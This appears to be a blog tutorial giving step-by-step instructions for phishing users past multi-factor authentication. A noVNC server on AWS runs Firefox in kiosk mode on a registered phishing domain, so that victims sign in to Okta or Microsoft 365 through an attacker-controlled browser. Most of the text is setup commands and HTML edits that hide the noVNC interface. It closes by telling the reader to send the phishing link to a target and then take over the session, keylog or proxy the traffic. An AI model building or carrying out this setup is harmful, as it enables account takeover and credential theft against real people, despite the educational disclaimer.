MFA Phishing using noVNC and AWS

Disclaimer: The information provided on this blog is for educational and informational purposes only. The author does not support or condone any illegal or unethical behaviour, including but not limited to hacking. By accessing this blog, you agree to use the information solely for lawful and ethical purposes.

As Identity and Access Management (IdAM) solutions actively attempt to detect multi-factor authentication (MFA) based phishing tools like Evilginx2, I began researching alternatives and came across an excellent blog article from MrD0x at https://mrd0x.com/bypass-2fa-using-novnc/. All credit for this technique goes to him. This article provides guidance on how to set up a working campaign using AWS.

The idea behind this technique is to phish a user into visiting a noVNC server that you control as an attacker, running a browser in kiosk mode. The user then accesses a legitimate service, such as Okta or O365, and enters their credentials, including MFA. Following this, we can either kick the user and take over the session, keylog, or proxy all traffic.

EC2 Instance

Select a Ubuntu 22.04 LTS AMI with the t2.medium instance type as using noVNC is graphic intensive.

Security group

Enable inbound rules 22/tcp to SSH into the instance and 443/tcp to access the noVNC server.

DNS Setup using Route53

Register your phishing domain and under hosted zone create an A record pointing to the IP of the EC2 Instance you are running.

Setup certificate for TLS

sudo apt install certbot
sudo certbot certonly --standalone -d yourphishingdomain.com

Enter all the details to generate the certificate.

Make a of note of where the certificate and key is stored. Usually in /etc/letsencrypt/live/yourphishingdomain.com/

Install Tigervnc

sudo apt update
sudo apt install tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer
sudo apt install ubuntu-gnome-desktop
sudo systemctl enable gdm
sudo systemctl start gdm

Install dbus-x11

sudo apt install dbus-x11

There is a known blank screen issue which can be fixed by uncommenting:

WaylandEnable=false in the /etc/gdm3/custom.conf file.

Setup VNC password

vncpasswd

Create a really long password with random characters. This will come in handy later.

Create ~/.vnc/xstartup

#!/bin/sh
# Start Gnome 3 Desktop 
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
vncconfig -iconic &
dbus-launch — exit-with-session gnome-session

Change permissions

chmod +x ~/.vnc/xstartup

Run vncserver

vncserver -depth 32 -geometry 2000x1000

Setup noVNC

git clone https://github.com/novnc/noVNC.git

Edit ./noVNC/vnc.html to modify the page title and make the following changes to remove the control bar and make the loading page white:

<div id=”noVNC_control_bar_anchor” class=”noVNC_vcenter” style=”display:none;”>
<div id=”noVNC_status” style=”display:none”></div>
<div id="noVNC_transition" style="background-color:white;color:white">

Copy the certificate and key previously generated to your home folder and then run:

sudo ./noVNC/utils/novnc_proxy --listen 443 --vnc 0.0.0.0:5901 --cert /home/ubuntu/cert/fullchain.pem --key /home/ubuntu/cert/privkey.pem

Install Firefox

wget -O ~/FirefoxSetup.tar.bz2 “https://download.mozilla.org/?product=firefox-latest&os=linux64"
sudo tar xjf ~/FirefoxSetup.tar.bz2 -C /opt/
sudo ln -s /opt/firefox/firefox /usr/bin/firefox

First, confirm that your setup is complete by accessing the noVNC server at https://yourphishingdomain.com/vnc.html?autoconnect=true&password=reallyreallylongpasswordwithrandomcharacters&resize=remote

Next, launch Firefox and set the homepage to the URL you want the user to visit (such as https://companyname.okta.com or https://login.microsoftonline.com).

Make sure to disable auto screen lock.

Close Firefox and restart it in kiosk mode.

firefox --kiosk

You can now share the phishing link with your target user.

As the attacker, you can monitor the user’s session in your own browser, but be careful when clicking your mouse. Remember that the user has remote access to the machine, so ensure that appropriate lockdown steps have been taken and that the user cannot escape kiosk mode. This technique is best suited for spear phishing a small number of users and is not recommended for larger campaigns. If you are targeting multiple users, consider running multiple VNC servers on different ports.